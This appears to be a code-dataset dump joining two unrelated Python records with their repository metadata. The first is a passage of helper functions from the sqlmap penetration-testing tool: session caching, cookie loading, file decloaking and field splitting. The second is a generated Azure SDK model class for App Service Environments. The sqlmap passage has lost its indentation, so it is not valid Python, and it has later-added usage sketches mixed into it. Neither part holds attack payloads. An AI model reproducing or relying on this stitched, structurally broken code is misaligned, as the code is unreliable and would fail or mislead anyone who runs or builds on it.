"""
Helper function for writing session data to HashDB
"""
_ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE)
conf.hashDB.write(_, value, serialize)
def hashDBRetrieve(key, unserialize=False, checkConf=False):
"""
Helper function for restoring session data from HashDB
"""
_ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE)
retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None
if not kb.inferenceMode and not kb.fileReadMode and any(_ in (retVal or "") for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)):
retVal = None
return retVal
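# Hedged usage sketch (added): both helpers key the stored value by target
# (conf.url or hostname:port), the supplied key and HASHDB_MILESTONE_VALUE,
# so values written in one run can be resumed in a later run against the same
# target. The key name below is hypothetical and conf.hashDB must already be
# initialized:
def _exampleHashDBUsage():
    hashDBWrite("exampleBanner", "MySQL 5.7")
    return hashDBRetrieve("exampleBanner")  # "MySQL 5.7" when resuming is enabled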
def resetCookieJar(cookieJar):
"""
Cleans cookies from a given cookie jar
"""
if not conf.loadCookies:
cookieJar.clear()
else:
try:
if not cookieJar.filename:
infoMsg = "loading cookies from '%s'" % conf.loadCookies
logger.info(infoMsg)
content = readCachedFileContent(conf.loadCookies)
lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#')))
handle, filename = tempfile.mkstemp(prefix="sqlmapcj-")
os.close(handle)
# Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html
with open(filename, "w+b") as f:
f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES)
for line in lines:
_ = line.split()
if len(_) == 7:
_[4] = FORCE_COOKIE_EXPIRATION_TIME
f.write("\n%s" % "\t".join(_))
cookieJar.filename = filename
cookieJar.load(cookieJar.filename, ignore_expires=True)
for cookie in cookieJar:
if cookie.expires < time.time():
warnMsg = "cookie '%s' has expired" % cookie
singleTimeWarnMessage(warnMsg)
cookieJar.clear_expired_cookies()
if not cookieJar._cookies:
errMsg = "no valid cookies found"
raise SqlmapGenericException(errMsg)
except cookielib.LoadError, msg:
errMsg = "there was a problem loading "
errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg))
raise SqlmapGenericException(errMsg)
def decloakToTemp(filename):
"""
Decloaks content of a given file to a temporary file with similar name and extension
"""
content = decloak(filename)
_ = os.path.split(filename[:-1])[-1]
prefix, suffix = os.path.splitext(_)
prefix = prefix.split(os.extsep)[0]
handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix)
os.close(handle)
with open(filename, "w+b") as f:
f.write(content)
return filename
def prioritySortColumns(columns):
"""
Sorts given column names by length in ascending order while those containing
string 'id' go first
>>> prioritySortColumns(['password', 'userid', 'name'])
['userid', 'name', 'password']
"""
_ = lambda x: x and "id" in x.lower()
return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0)
def getRequestHeader(request, name):
"""
    Solves an issue with urllib2 Request header case sensitivity
Reference: http://bugs.python.org/issue2275
"""
retVal = None
if request and name:
retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items())
return retVal
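# Hedged usage sketch (added): the lookup is case-insensitive, so a header
# that urllib2 internally stores as "User-agent" is still found when asked
# for with different casing:
def _exampleGetRequestHeader():
    import urllib2
    req = urllib2.Request("http://www.example.com/", headers={"User-Agent": "sqlmap"})
    return getRequestHeader(req, "USER-AGENT")  # "sqlmap"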
def isNumber(value):
"""
Returns True if the given value is a number-like object
>>> isNumber(1)
True
>>> isNumber('0')
True
>>> isNumber('foobar')
False
"""
try:
float(value)
except:
return False
else:
return True
def zeroDepthSearch(expression, value):
"""
    Searches for occurrences of value inside expression at parenthesis
    depth 0 (i.e. outside any parentheses)
"""
retVal = []
depth = 0
for index in xrange(len(expression)):
if expression[index] == '(':
depth += 1
elif expression[index] == ')':
depth -= 1
elif depth == 0 and expression[index:index + len(value)] == value:
retVal.append(index)
return retVal
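# Hedged usage sketch (added; not part of the original module): only delimiters
# outside parentheses are reported, which is what splitFields() below relies on:
def _exampleZeroDepthSearch():
    # the comma inside "max(b, c)" sits at depth 1 and is therefore skipped
    return zeroDepthSearch("SELECT a, max(b, c)", ",")  # [8]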
def splitFields(fields, delimiter=','):
"""
    Returns list of (0-depth) fields split by delimiter
>>> splitFields('foo, bar, max(foo, bar)')
['foo', 'bar', 'max(foo,bar)']
"""
fields = fields.replace("%s " % delimiter, delimiter)
commas = [-1, len(fields)]
commas.extend(zeroDepthSearch(fields, ','))
commas = sorted(commas)
return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])]
def pollProcess(process, suppress_errors=False):
"""
Checks for process status (prints . if still running)
"""
while True:
dataToStdout(".")
time.sleep(1)
returncode = process.poll()
if returncode is not None:
if not suppress_errors:
if returncode == 0:
dataToStdout(" done\n")
elif returncode < 0:
dataToStdout(" process terminated by signal %d\n" % returncode)
elif returncode > 0:
dataToStdout(" quit unexpectedly with return code %d\n" % returncode)
break
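# Hedged usage sketch (added; not part of the original module): pollProcess()
# blocks until the given subprocess finishes, printing a progress dot roughly
# every second and a short status line once it exits:
def _examplePollProcess():
    import subprocess
    process = subprocess.Popen(["sleep", "3"])  # hypothetical long-running task
    pollProcess(process)  # prints "...", then " done" on clean exit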
|
goofwear/raspberry_pwn
|
src/pentest/sqlmap/lib/core/common.py
|
Python
|
gpl-3.0
| 126,017
|
[
"VisIt"
] |
287b09412f707b06a0fa06a1329b5312061d9a8b43081a7ead7ddeb5ac2bcfdd
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .resource import Resource
class AppServiceEnvironmentResource(Resource):
"""App Service Environment ARM resource.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar id: Resource Id.
:vartype id: str
:ivar name: Resource Name.
:vartype name: str
:param kind: Kind of resource.
:type kind: str
:param location: Resource Location.
:type location: str
:ivar type: Resource type.
:vartype type: str
:param tags: Resource tags.
:type tags: dict[str, str]
:param app_service_environment_resource_name: Name of the App Service
Environment.
:type app_service_environment_resource_name: str
:param app_service_environment_resource_location: Location of the App
Service Environment, e.g. "West US".
:type app_service_environment_resource_location: str
:ivar provisioning_state: Provisioning state of the App Service
Environment. Possible values include: 'Succeeded', 'Failed', 'Canceled',
'InProgress', 'Deleting'
:vartype provisioning_state: str or
~azure.mgmt.web.models.ProvisioningState
:ivar status: Current status of the App Service Environment. Possible
values include: 'Preparing', 'Ready', 'Scaling', 'Deleting'
:vartype status: str or ~azure.mgmt.web.models.HostingEnvironmentStatus
:param vnet_name: Name of the Virtual Network for the App Service
Environment.
:type vnet_name: str
:param vnet_resource_group_name: Resource group of the Virtual Network.
:type vnet_resource_group_name: str
:param vnet_subnet_name: Subnet of the Virtual Network.
:type vnet_subnet_name: str
:param virtual_network: Description of the Virtual Network.
:type virtual_network: ~azure.mgmt.web.models.VirtualNetworkProfile
:param internal_load_balancing_mode: Specifies which endpoints to serve
internally in the Virtual Network for the App Service Environment.
Possible values include: 'None', 'Web', 'Publishing'
:type internal_load_balancing_mode: str or
~azure.mgmt.web.models.InternalLoadBalancingMode
:param multi_size: Front-end VM size, e.g. "Medium", "Large".
:type multi_size: str
:param multi_role_count: Number of front-end instances.
:type multi_role_count: int
:param worker_pools: Description of worker pools with worker size IDs, VM
sizes, and number of workers in each pool.
:type worker_pools: list[~azure.mgmt.web.models.WorkerPool]
:param ipssl_address_count: Number of IP SSL addresses reserved for the
App Service Environment.
:type ipssl_address_count: int
:ivar database_edition: Edition of the metadata database for the App
Service Environment, e.g. "Standard".
:vartype database_edition: str
:ivar database_service_objective: Service objective of the metadata
database for the App Service Environment, e.g. "S0".
:vartype database_service_objective: str
:ivar upgrade_domains: Number of upgrade domains of the App Service
Environment.
:vartype upgrade_domains: int
:ivar subscription_id: Subscription of the App Service Environment.
:vartype subscription_id: str
:param dns_suffix: DNS suffix of the App Service Environment.
:type dns_suffix: str
:ivar last_action: Last deployment action on the App Service Environment.
:vartype last_action: str
:ivar last_action_result: Result of the last deployment action on the App
Service Environment.
:vartype last_action_result: str
:ivar allowed_multi_sizes: List of comma separated strings describing
which VM sizes are allowed for front-ends.
:vartype allowed_multi_sizes: str
:ivar allowed_worker_sizes: List of comma separated strings describing
which VM sizes are allowed for workers.
:vartype allowed_worker_sizes: str
:ivar maximum_number_of_machines: Maximum number of VMs in the App Service
Environment.
:vartype maximum_number_of_machines: int
:ivar vip_mappings: Description of IP SSL mapping for the App Service
Environment.
:vartype vip_mappings: list[~azure.mgmt.web.models.VirtualIPMapping]
:ivar environment_capacities: Current total, used, and available worker
capacities.
:vartype environment_capacities:
list[~azure.mgmt.web.models.StampCapacity]
:param network_access_control_list: Access control list for controlling
traffic to the App Service Environment.
:type network_access_control_list:
list[~azure.mgmt.web.models.NetworkAccessControlEntry]
:ivar environment_is_healthy: True/false indicating whether the App
Service Environment is healthy.
:vartype environment_is_healthy: bool
    :ivar environment_status: Detailed message with results of the last
check of the App Service Environment.
:vartype environment_status: str
:ivar resource_group: Resource group of the App Service Environment.
:vartype resource_group: str
:param front_end_scale_factor: Scale factor for front-ends.
:type front_end_scale_factor: int
:ivar default_front_end_scale_factor: Default Scale Factor for FrontEnds.
:vartype default_front_end_scale_factor: int
:param api_management_account_id: API Management Account associated with
the App Service Environment.
:type api_management_account_id: str
:param suspended: <code>true</code> if the App Service Environment is
suspended; otherwise, <code>false</code>. The environment can be
suspended, e.g. when the management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type suspended: bool
:param dynamic_cache_enabled: True/false indicating whether the App
Service Environment is suspended. The environment can be suspended e.g.
when the management endpoint is no longer available
(most likely because NSG blocked the incoming traffic).
:type dynamic_cache_enabled: bool
:param cluster_settings: Custom settings for changing the behavior of the
App Service Environment.
:type cluster_settings: list[~azure.mgmt.web.models.NameValuePair]
:param user_whitelisted_ip_ranges: User added ip ranges to whitelist on
ASE db
:type user_whitelisted_ip_ranges: list[str]
"""
_validation = {
'id': {'readonly': True},
'name': {'readonly': True},
'location': {'required': True},
'type': {'readonly': True},
'app_service_environment_resource_name': {'required': True},
'app_service_environment_resource_location': {'required': True},
'provisioning_state': {'readonly': True},
'status': {'readonly': True},
'virtual_network': {'required': True},
'worker_pools': {'required': True},
'database_edition': {'readonly': True},
'database_service_objective': {'readonly': True},
'upgrade_domains': {'readonly': True},
'subscription_id': {'readonly': True},
'last_action': {'readonly': True},
'last_action_result': {'readonly': True},
'allowed_multi_sizes': {'readonly': True},
'allowed_worker_sizes': {'readonly': True},
'maximum_number_of_machines': {'readonly': True},
'vip_mappings': {'readonly': True},
'environment_capacities': {'readonly': True},
'environment_is_healthy': {'readonly': True},
'environment_status': {'readonly': True},
'resource_group': {'readonly': True},
'default_front_end_scale_factor': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'app_service_environment_resource_name': {'key': 'properties.name', 'type': 'str'},
'app_service_environment_resource_location': {'key': 'properties.location', 'type': 'str'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'ProvisioningState'},
'status': {'key': 'properties.status', 'type': 'HostingEnvironmentStatus'},
'vnet_name': {'key': 'properties.vnetName', 'type': 'str'},
'vnet_resource_group_name': {'key': 'properties.vnetResourceGroupName', 'type': 'str'},
'vnet_subnet_name': {'key': 'properties.vnetSubnetName', 'type': 'str'},
'virtual_network': {'key': 'properties.virtualNetwork', 'type': 'VirtualNetworkProfile'},
'internal_load_balancing_mode': {'key': 'properties.internalLoadBalancingMode', 'type': 'InternalLoadBalancingMode'},
'multi_size': {'key': 'properties.multiSize', 'type': 'str'},
'multi_role_count': {'key': 'properties.multiRoleCount', 'type': 'int'},
'worker_pools': {'key': 'properties.workerPools', 'type': '[WorkerPool]'},
'ipssl_address_count': {'key': 'properties.ipsslAddressCount', 'type': 'int'},
'database_edition': {'key': 'properties.databaseEdition', 'type': 'str'},
'database_service_objective': {'key': 'properties.databaseServiceObjective', 'type': 'str'},
'upgrade_domains': {'key': 'properties.upgradeDomains', 'type': 'int'},
'subscription_id': {'key': 'properties.subscriptionId', 'type': 'str'},
'dns_suffix': {'key': 'properties.dnsSuffix', 'type': 'str'},
'last_action': {'key': 'properties.lastAction', 'type': 'str'},
'last_action_result': {'key': 'properties.lastActionResult', 'type': 'str'},
'allowed_multi_sizes': {'key': 'properties.allowedMultiSizes', 'type': 'str'},
'allowed_worker_sizes': {'key': 'properties.allowedWorkerSizes', 'type': 'str'},
'maximum_number_of_machines': {'key': 'properties.maximumNumberOfMachines', 'type': 'int'},
'vip_mappings': {'key': 'properties.vipMappings', 'type': '[VirtualIPMapping]'},
'environment_capacities': {'key': 'properties.environmentCapacities', 'type': '[StampCapacity]'},
'network_access_control_list': {'key': 'properties.networkAccessControlList', 'type': '[NetworkAccessControlEntry]'},
'environment_is_healthy': {'key': 'properties.environmentIsHealthy', 'type': 'bool'},
'environment_status': {'key': 'properties.environmentStatus', 'type': 'str'},
'resource_group': {'key': 'properties.resourceGroup', 'type': 'str'},
'front_end_scale_factor': {'key': 'properties.frontEndScaleFactor', 'type': 'int'},
'default_front_end_scale_factor': {'key': 'properties.defaultFrontEndScaleFactor', 'type': 'int'},
'api_management_account_id': {'key': 'properties.apiManagementAccountId', 'type': 'str'},
'suspended': {'key': 'properties.suspended', 'type': 'bool'},
'dynamic_cache_enabled': {'key': 'properties.dynamicCacheEnabled', 'type': 'bool'},
'cluster_settings': {'key': 'properties.clusterSettings', 'type': '[NameValuePair]'},
'user_whitelisted_ip_ranges': {'key': 'properties.userWhitelistedIpRanges', 'type': '[str]'},
}
def __init__(self, location, app_service_environment_resource_name, app_service_environment_resource_location, virtual_network, worker_pools, kind=None, tags=None, vnet_name=None, vnet_resource_group_name=None, vnet_subnet_name=None, internal_load_balancing_mode=None, multi_size=None, multi_role_count=None, ipssl_address_count=None, dns_suffix=None, network_access_control_list=None, front_end_scale_factor=None, api_management_account_id=None, suspended=None, dynamic_cache_enabled=None, cluster_settings=None, user_whitelisted_ip_ranges=None):
super(AppServiceEnvironmentResource, self).__init__(kind=kind, location=location, tags=tags)
self.app_service_environment_resource_name = app_service_environment_resource_name
self.app_service_environment_resource_location = app_service_environment_resource_location
self.provisioning_state = None
self.status = None
self.vnet_name = vnet_name
self.vnet_resource_group_name = vnet_resource_group_name
self.vnet_subnet_name = vnet_subnet_name
self.virtual_network = virtual_network
self.internal_load_balancing_mode = internal_load_balancing_mode
self.multi_size = multi_size
self.multi_role_count = multi_role_count
self.worker_pools = worker_pools
self.ipssl_address_count = ipssl_address_count
self.database_edition = None
self.database_service_objective = None
self.upgrade_domains = None
self.subscription_id = None
self.dns_suffix = dns_suffix
self.last_action = None
self.last_action_result = None
self.allowed_multi_sizes = None
self.allowed_worker_sizes = None
self.maximum_number_of_machines = None
self.vip_mappings = None
self.environment_capacities = None
self.network_access_control_list = network_access_control_list
self.environment_is_healthy = None
self.environment_status = None
self.resource_group = None
self.front_end_scale_factor = front_end_scale_factor
self.default_front_end_scale_factor = None
self.api_management_account_id = api_management_account_id
self.suspended = suspended
self.dynamic_cache_enabled = dynamic_cache_enabled
self.cluster_settings = cluster_settings
self.user_whitelisted_ip_ranges = user_whitelisted_ip_ranges
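# Hedged usage sketch (added for illustration; not part of the generated model
# file). The resource names and nested model arguments below are hypothetical;
# only location, the ASE name/location, virtual_network and worker_pools are
# required by the validation map above:
#
#   ase = AppServiceEnvironmentResource(
#       location="West US",
#       app_service_environment_resource_name="my-ase",
#       app_service_environment_resource_location="West US",
#       virtual_network=VirtualNetworkProfile(id="/subscriptions/.../myVnet"),
#       worker_pools=[WorkerPool(worker_size="Small", worker_count=2)],
#   )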
|
lmazuel/azure-sdk-for-python
|
azure-mgmt-web/azure/mgmt/web/models/app_service_environment_resource.py
|
Python
|
mit
| 13,994
|
[
"ASE"
] |
9198f9702a17d17c406e87c7d3f7e38f4040deff371ed6254a0755ab723f6525
|